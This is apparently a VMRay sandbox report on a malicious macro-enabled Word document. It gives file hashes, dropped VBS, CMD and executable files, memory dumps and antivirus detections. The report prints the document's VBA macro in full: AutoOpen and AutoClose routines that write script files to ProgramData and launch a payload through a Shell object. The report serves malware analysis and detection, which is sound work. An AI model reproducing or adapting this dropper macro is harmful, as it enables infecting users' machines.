b2946daf...3c4d | Files
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Dropper
Downloader
Threat Names:
Trojan.GenericKDZ.69442
Trojan.GenericKDZ.69475
Trojan.Agent.EVAV
...

payload_1.doc

Word Document

Created at 2020-08-17T10:01:00

...

Remarks (1/1)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "30 seconds" to "10 seconds" to reveal dormant functionality.

Filters:
Filename Category Type Severity Actions
C:\Users\FD1HVy\Desktop\payload_1.doc Sample File Word Document
Malicious
...
»
Mime Type application/vnd.ms-word.document.macroEnabled.12
File Size 381.40 KB
MD5 f05fe39e81df5368c442a13202b4ab53 Copy to Clipboard
SHA1 0087d1d0cdde6268a425ef6d546a77e3a120c0f5 Copy to Clipboard
SHA256 b2946daf21b5a0d9c70f32230f6e511ff4aeb939fc8f9a5d372a67f932483c4d Copy to Clipboard
SSDeep 6144:cfm2kjkjxuWiyKMUsTn8XBlKqqUY1BaE8D7h6JDAm30QWIOtfXuu4MCUlmoykTHt:cfm2hVuW7VgmUYSDevEbIOE7gFywyq+K Copy to Clipboard
ImpHash -
Office Information
»
Creator Пользователь Windows
Last Modified By Пользователь Windows
Revision 138
Create Time 2020-08-11 10:03:00+00:00
Modify Time 2020-08-14 13:12:00+00:00
Document Information
»
Application Microsoft Office Word
App Version 14.0000
Template Normal.dotm
Company SPecialiST RePack
Document Security NONE
Editing Time 4286.0
Page Count 1
Line Count 6
Paragraph Count 1
Word Count 130
Character Count 742
Chars With Spaces 871
Base Target ['C:\\ProgramData\\JHJKGHuggUGUGYYuyggg.vbs']
ScaleCrop False
SharedDoc False
VBA Macros (1)
»
Macro #1: Brofaset
» 
Attribute VB_Name = "Brofaset"
Private HYyetwertuFGHFTrt5ertRFGXFD
Sub autoopen()

Open "C:\ProgramData\UIYUIYUIYuiyuiYUIYYuyty" & JDSUAGDFYYUGED.Tag For Binary As #1

Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "

Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "
Put #1, , "      Page not found       This question was voluntarily removed by its author.                  "


Close #1
   
Application.Quit SaveChanges:=False

End Sub
Sub autoclose()


Open "C:\ProgramData\JHJKGHuggUGUGYYuyggg" & JDSUAGDFYYUGED.Tag For Binary As #1



Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "

Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "
Put #1, , "                      'If you feel something is                                   'missing that should be here, contact us.                               "


Put #1, , JDSUAGDFYYUGED.GHJHGFGHKFTKDFTYFTFYDDYDFLRYTYDDYDFYKLDKTY.Caption

Close #1
      
Set HYyetwertuFGHFTrt5ertRFGXFD = CreateObject(JDSUAGDFYYUGED.Caption)
HYyetwertuFGHFTrt5ertRFGXFD.Exec "explorer.exe " & Hopertiol.DefaultTargetFrame

End Sub
Local AV Matches (1)
»
Threat Name Severity
Trojan.GenericKDZ.69442
Malicious
C:\Users\FD1HVy\AppData\Roaming\Microsoft\Qieeyrekuc\xafpqko.exe Downloaded File Binary
Malicious
...
»
Also Known As C:\BlotRots\Loterios.exe (Downloaded File)
111111.png (Embedded File)
Parent File analysis.pcap
Mime Type application/vnd.microsoft.portable-executable
File Size 841.93 KB
MD5 58b7e077fdcaae67670713374fe6e869 Copy to Clipboard
SHA1 2cf12d3b8f62528bc1d02d2fe3b0e5a877676576 Copy to Clipboard
SHA256 37790b6946072ccacb7cf9be694b962deee2c53818449eba20f450389d0cfa4a Copy to Clipboard
SSDeep 6144:VMhkpTK06/aA6udzpNi1yna2PiQ0erLeROSEGo89QNn/o8S2M1KpWwR+SHvRu4Tr:VMEK06CmNi1L54Z89QNNpJgC5j Copy to Clipboard
ImpHash -
Local AV Matches (1)
»
Threat Name Severity
Trojan.GenericKDZ.69475
Malicious
C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs Dropped File Text
Blacklisted
...
»
Mime Type text/x-vbscript
File Size 68.40 KB
MD5 ad7b09adba59218ce485148faf21dc82 Copy to Clipboard
SHA1 0a3851f903f7d928688e5ebeee13f6d5d921b4de Copy to Clipboard
SHA256 214fd312196dd5769f94ed778c50df1eaf49a5c8287c67edcf2fbd05dff02cb2 Copy to Clipboard
SSDeep 1536:TC70ITO1lsleRKby43mmImmmmm/V1GRpCcPh45V7yJVx4wFc4PMo5Y1ns3wt:T5yO1lQ33mmImmmmmd14CTt1ns3wt Copy to Clipboard
ImpHash -
File Reputation Information
»
Severity
Blacklisted
Names Mal/Generic-S
vbaProject.bin Embedded File OLE Compound
Blacklisted
...
»
Parent File C:\Users\FD1HVy\Desktop\payload_1.doc
Mime Type application/CDFV2
File Size 162.00 KB
MD5 cf8c43d0b64478708ccfa80aa8e87bc8 Copy to Clipboard
SHA1 aad4fb86e5cc03ded0aeba3e334569e95706b0a7 Copy to Clipboard
SHA256 a09c4e6ff2ee16e7b6cd1865e33147711f0f894ce99000937444da61dd36d50e Copy to Clipboard
SSDeep 1536:37WNeMBHx1GGd+CKtfSo4+oYFNaeI2bsuhNe4VTdRnTT8w4TWnqp:eeA3GGRwfkYFdhNe4VTdRnTT8w4TWnq Copy to Clipboard
ImpHash -
File Reputation Information
»
Severity
Blacklisted
Names Mal/Generic-S
c:\users\fd1hvy\appdata\local\temp\~df4ab52671a349b2ff.tmp Dropped File Stream
Whitelisted
...
»
Mime Type application/octet-stream
File Size 512 Bytes
MD5 bf619eac0cdf3f68d496ea9344137e8b Copy to Clipboard
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 Copy to Clipboard
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
File Reputation Information
»
Severity
Whitelisted
c:\users\fd1hvy\appdata\local\temp\~dff1121ef9e20057e3.tmp Dropped File OLE Compound
Whitelisted
...
»
Mime Type application/CDFV2
File Size 1.50 KB
MD5 72f5c05b7ea8dd6059bf59f50b22df33 Copy to Clipboard
SHA1 d5af52e129e15e3a34772806f6c5fbf132e7408e Copy to Clipboard
SHA256 1dc0c8d7304c177ad0e74d3d2f1002eb773f4b180685a7df6bbe75ccc24b0164 Copy to Clipboard
SSDeep 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X Copy to Clipboard
ImpHash -
File Reputation Information
»
Severity
Whitelisted
C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbvqg2du.z4l.ps1 Dropped File Text
Whitelisted
...
»
Also Known As C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_hby2evjc.ztp.psm1 (Dropped File)
Mime Type text/x-powershell
File Size 1 Bytes
MD5 c4ca4238a0b923820dcc509a6f75849b Copy to Clipboard
SHA1 356a192b7913b04c54574d18c28d46e6395428ab Copy to Clipboard
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b Copy to Clipboard
SSDeep 3:U:U Copy to Clipboard
ImpHash -
File Reputation Information
»
Severity
Whitelisted
C:\BlotRots\Loterios.exe Dropped File Binary
Whitelisted
...
»
Mime Type application/vnd.microsoft.portable-executable
File Size 25.50 KB
MD5 159ab34f06af279ef3f57c2ceadb9768 Copy to Clipboard
SHA1 dcabf4bba851e92d45e5a60390bb4eb2b1ef5fd4 Copy to Clipboard
SHA256 c0f9cc1663b74a106c5c3356988ffa42d64f9c941ef9cb46aabf16ce8a213baf Copy to Clipboard
SSDeep 384:qP3sr4k8HXLiZi20WSIYWfiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiLiiiiir9:fYig29i Copy to Clipboard
ImpHash 888263dd2e0b3db374c7948581a974ed Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
PE Information
»
Image Base 0x400000
Entry Point 0x401b80
Size Of Code 0x1000
Size Of Initialized Data 0x5400
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 2066-10-03 12:52:05+00:00
Version Information (8)
»
CompanyName Microsoft Corporation
FileDescription Windows Calculator
FileVersion 10.0.15063.0 (WinBuild.160101.0800)
InternalName CALC
LegalCopyright © Microsoft Corporation. All rights reserved.
OriginalFilename CALC.EXE
ProductName Microsoft® Windows® Operating System
ProductVersion 10.0.15063.0
Sections (5)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0xf6c 0x1000 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 5.73
.data 0x402000 0x3a4 0x200 0x1400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.3
.idata 0x403000 0x4a8 0x600 0x1600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.05
.rsrc 0x404000 0x4708 0x4800 0x1c00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 2.81
.reloc 0x409000 0x170 0x200 0x6400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 5.0
Imports (7)
»
SHELL32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ShellExecuteW 0x0 0x403038 0x3174 0x1774 0x1b8
KERNEL32.dll (9)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SetUnhandledExceptionFilter 0x0 0x403010 0x314c 0x174c 0x55e
GetCurrentProcess 0x0 0x403014 0x3150 0x1750 0x213
TerminateProcess 0x0 0x403018 0x3154 0x1754 0x57c
UnhandledExceptionFilter 0x0 0x40301c 0x3158 0x1758 0x59d
GetCurrentProcessId 0x0 0x403020 0x315c 0x175c 0x214
GetCurrentThreadId 0x0 0x403024 0x3160 0x1760 0x218
GetSystemTimeAsFileTime 0x0 0x403028 0x3164 0x1764 0x2e2
GetTickCount 0x0 0x40302c 0x3168 0x1768 0x300
QueryPerformanceCounter 0x0 0x403030 0x316c 0x176c 0x440
msvcrt.dll (15)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
_amsg_exit 0x0 0x403058 0x3194 0x1794 0x111
__p__fmode 0x0 0x40305c 0x3198 0x1798 0xce
__setusermatherr 0x0 0x403060 0x319c 0x179c 0xe4
_initterm 0x0 0x403064 0x31a0 0x17a0 0x1e8
_wcmdln 0x0 0x403068 0x31a4 0x17a4 0x405
?terminate@@YAXXZ 0x0 0x40306c 0x31a8 0x17a8 0x35
_controlfp 0x0 0x403070 0x31ac 0x17ac 0x137
_except_handler4_common 0x0 0x403074 0x31b0 0x17b0 0x16a
_exit 0x0 0x403078 0x31b4 0x17b4 0x173
__p__commode 0x0 0x40307c 0x31b8 0x17b8 0xc9
_XcptFilter 0x0 0x403080 0x31bc 0x17bc 0x6f
exit 0x0 0x403084 0x31c0 0x17c0 0x4ae
__set_app_type 0x0 0x403088 0x31c4 0x17c4 0xe2
__wgetmainargs 0x0 0x40308c 0x31c8 0x17c8 0xf1
_cexit 0x0 0x403090 0x31cc 0x17cc 0x124
ADVAPI32.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
EventRegister 0x0 0x403000 0x313c 0x173c 0x120
EventSetInformation 0x0 0x403004 0x3140 0x1740 0x121
EventWriteTransfer 0x0 0x403008 0x3144 0x1744 0x128
api-ms-win-core-synch-l1-2-0.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
Sleep 0x0 0x403050 0x318c 0x178c 0x2d
api-ms-win-core-processthreads-l1-1-2.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetStartupInfoW 0x0 0x403048 0x3184 0x1784 0x20
api-ms-win-core-libraryloader-l1-2-0.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetModuleHandleA 0x0 0x403040 0x317c 0x177c 0x11
Memory Dumps (15)
»
Name Process ID Start VA End VA Dump Reason PE Rebuild Bitness Entry Point AV YARA Actions
loterios.exe 19 0x00400000 0x004D2FFF Relevant Image True 32-bit 0x00401A5B True False
...
buffer 19 0x020A0000 0x0216EFFF First Execution True 32-bit 0x020AB330 True False
...
buffer 19 0x020A0000 0x0216EFFF Content Changed True 32-bit 0x020AD731 True False
...
buffer 19 0x020A0000 0x0216EFFF Content Changed True 32-bit 0x020A749C True False
...
buffer 19 0x020A0000 0x0216EFFF Content Changed True 32-bit 0x020A1FEB True False
...
loterios.exe 21 0x00400000 0x004D2FFF Relevant Image True 32-bit 0x00401A5B True False
...
buffer 21 0x02070000 0x0213EFFF First Execution True 32-bit 0x0207B330 True False
...
buffer 21 0x02070000 0x0213EFFF Content Changed True 32-bit 0x0207D731 True False
...
buffer 21 0x02070000 0x0213EFFF Content Changed True 32-bit 0x0207749C True False
...
buffer 21 0x02070000 0x0213EFFF Content Changed True 32-bit 0x02071FEB True False
...
loterios.exe 21 0x00400000 0x004D2FFF Process Termination True 32-bit - True False
...
xafpqko.exe 22 0x00400000 0x004D2FFF Relevant Image True 32-bit 0x00401A5B True False
...
loterios.exe 19 0x00400000 0x004D2FFF Process Termination True 32-bit - True False
...
xafpqko.exe 26 0x00400000 0x004D2FFF Relevant Image True 32-bit 0x00401A5B True False
...
buffer 26 0x02070000 0x0213EFFF First Execution True 32-bit 0x0207B330 True False
...
C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Modified File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 47.45 KB
MD5 ee5c425bd4738521f177f2a418bb1745 Copy to Clipboard
SHA1 dbfa3fa1dd387290394fdfa19e163a2ef774567a Copy to Clipboard
SHA256 1675997a7f2dbab63b955889ece8d81e0331e25a0b551f8fd563e04b1bc3cb9e Copy to Clipboard
SSDeep 768:jUpAa5BHMrxbfrRJPFh48Fq3ThRW/Y+e+jH0qlwKH/mYohV3IpNBQkj2As454Z6D:jUpAa5RMrxbflJdh4thRW/3e+jH0qWKh Copy to Clipboard
ImpHash -
C:\ProgramData\UIYUIYUIYuiyuiYUIYYuyty.vbs Dropped File Text
Unknown
...
»
Mime Type text/x-vbscript
File Size 2.37 KB
MD5 f07e30c22ead3c49606617eb04fbf9c7 Copy to Clipboard
SHA1 539dbd8cda2c1e6ada7a02e146c33b5aae7b1099 Copy to Clipboard
SHA256 4639cb4ccdef149ef325770ccf4fff658b7cb528d71661113dbfe9e1c683dbf9 Copy to Clipboard
SSDeep 24:v1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1pB1p1:t Copy to Clipboard
ImpHash -
C:\BlotRots\djsfgytdftftyYFGfghffghYYTTT.cmd Dropped File Batch
Unknown
...
»
Mime Type application/x-bat
File Size 5.93 KB
MD5 2d63e5c7ff61a560f0cc7dccd0661bf6 Copy to Clipboard
SHA1 995efc69bd84b193786de1a993ad7052f14e9542 Copy to Clipboard
SHA256 94a12075382cb44133ba8dd51973b583d4c2514f7d3d7414ae4d9a92b5354584 Copy to Clipboard
SSDeep 96:YSGSuSQSoSGScCSuSQSoSGScCSuSQSoSGScZNXt2fy8OtSuSQSoSGScCSuSQSoSc:SYfmm Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Roaming\Microsoft\Qieeyrekuc\xafpqko.dat Dropped File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 63 Bytes
MD5 2cf2ace32a9a9c6aebed3975a41b1a27 Copy to Clipboard
SHA1 d8a1df54794ee12b36051e1a6ae087c0dece6179 Copy to Clipboard
SHA256 eed8ec8e5b9e3133ceff1f87e6b4174e99a8029c5d4ab1c6a3953d1a8807cd32 Copy to Clipboard
SSDeep 3:ywhtsGz4/26kbhKjq8+LP35pPsn:yUtsG8Ebh98+L356 Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Roaming\Microsoft\Qieeyrekuc\xafpqko.dat Dropped File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 80 Bytes
MD5 2c863d3b50ac48b86a109f24d84179c6 Copy to Clipboard
SHA1 f64fe619cd5de1979287e6f6bf2bc354fbc0b666 Copy to Clipboard
SHA256 9df5fc5f7b4db8881976cc92e377e5d51bcfb74c76b92a965c9e343d47b9cf50 Copy to Clipboard
SSDeep 3:GnvLPCJCQicY2VlvE88MhA55lf0l9PZn:Gv7KCQicY2d8MhA1ynn Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Roaming\Microsoft\Qieeyrekuc\xafpqko.dat Dropped File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 172 Bytes
MD5 c658fbd34b9297e83d153ef2acc802bf Copy to Clipboard
SHA1 1627bbc3a3fe41794f59f31699e09c5704c7b3c8 Copy to Clipboard
SHA256 b0d2bf6da08350e1bd794d94f09567798e77491658b4a12f1d4baf9e9f228047 Copy to Clipboard
SSDeep 3:wLqwG20JY2VlvE88MhA55lf0l9PZltsrpUHyWhxxLegOUR95HFp8Y79tvLn:wLqwhIY2d8MhA1ynQrmyRgnEY7HL Copy to Clipboard
ImpHash -
document.xml Embedded File Text
Unknown
...
»
Parent File C:\Users\FD1HVy\Desktop\payload_1.doc
Mime Type text/xml
File Size 122.35 KB
MD5 b6608e351be97da6ac46b15cdb208f13 Copy to Clipboard
SHA1 98030b0d51b8fb18acbc17eee76ea43c4ad16251 Copy to Clipboard
SHA256 2689c777d804cc65a09bee259cbc39256390c3ad6e9f1794d794e3b1d361d662 Copy to Clipboard
SSDeep 1536:UYRGs41wV1NPAYkD2JDVhGI2JDVPPAYkD2JDVCAYkD2JDVhGaa:CD Copy to Clipboard
ImpHash -
footnotes.xml Embedded File Text
Unknown
...
»
Parent File C:\Users\FD1HVy\Desktop\payload_1.doc
Mime Type text/xml
File Size 1.57 KB
MD5 2282ed85cfc02646ca526f0a14924316 Copy to Clipboard
SHA1 99c1ec3815701a65d2f496296e2bb542e102709c Copy to Clipboard
SHA256 3c821e90238f6699f44ae71ec451d8ddd6663f60747dbb01dc376e2a118f4086 Copy to Clipboard
SSDeep 48:c4v+Bc6mNYYNEbz+qliS+Q+H+Uv+L+p4zRQ1ITRQh:9sc6mmY+bzZliSfiZoRK1bh Copy to Clipboard
ImpHash -
settings.xml Embedded File Text
Unknown
...
»
Parent File C:\Users\FD1HVy\Desktop\payload_1.doc
Mime Type text/xml
File Size 5.92 KB
MD5 ac75e026443cd05ae30409eec12d9e10 Copy to Clipboard
SHA1 a3dc71d64153da89fc83998fc33c16574dbdc194 Copy to Clipboard
SHA256 8558d5db67061bd559d38e9532fce71240db0f9fe962e6521c2231917b680c1c Copy to Clipboard
SSDeep 96:+c6mmY+bliStHhm93QxN9xbufLlxzuZRRaKTrIYtisqt99Q4SQga9S:+xmmY+gsHQ9ortisqt99Q4SQga9S Copy to Clipboard
ImpHash -
endnotes.xml Embedded File Text
Unknown
...
»
Parent File C:\Users\FD1HVy\Desktop\payload_1.doc
Mime Type text/xml
File Size 1.57 KB
MD5 5da516c9bd0e29ec357c52fcf4a5f5c2 Copy to Clipboard
SHA1 5ead4ecd9b7329c8a80d668be2e1219dd5f4f185 Copy to Clipboard
SHA256 9294de934df9fa2b8aa261e9abf071b5ef2c023e368125a6f23b4a8fdfd598be Copy to Clipboard
SSDeep 48:cpv+Bc6mNYYNEbz+qliS+Q+H+Uv+L+pNRQmTRQl:Usc6mmY+bzZliSfiZoBhl Copy to Clipboard
ImpHash -
image1.png Embedded File Image
Unknown
...
»
Parent File C:\Users\FD1HVy\Desktop\payload_1.doc
Mime Type image/png
File Size 326.69 KB
MD5 a867b95c7f735b6ac1f235e4dec72485 Copy to Clipboard
SHA1 854a1a8f5178f6e696bb245007b9903906b4af14 Copy to Clipboard
SHA256 fa285309506d70241db1db739c39e428c3eb88dc1229a80bcf15c36f5f71e6c2 Copy to Clipboard
SSDeep 6144:axuWiyKMUsTn8XBlKqqUY1BaE8D7h6JDAm30QWIOtfXuu4MCUlmoykTHSqSrg:muW7VgmUYSDevEbIOE7gFywyqv Copy to Clipboard
ImpHash -
c:\users\fd1hvy\appdata\roaming\microsoft\forms\winword.box Dropped File Unknown
Not Queried
...
»
Mime Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
VMRay - Analyzer - www.vmray.com
Legal Note - Privacy Policy
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image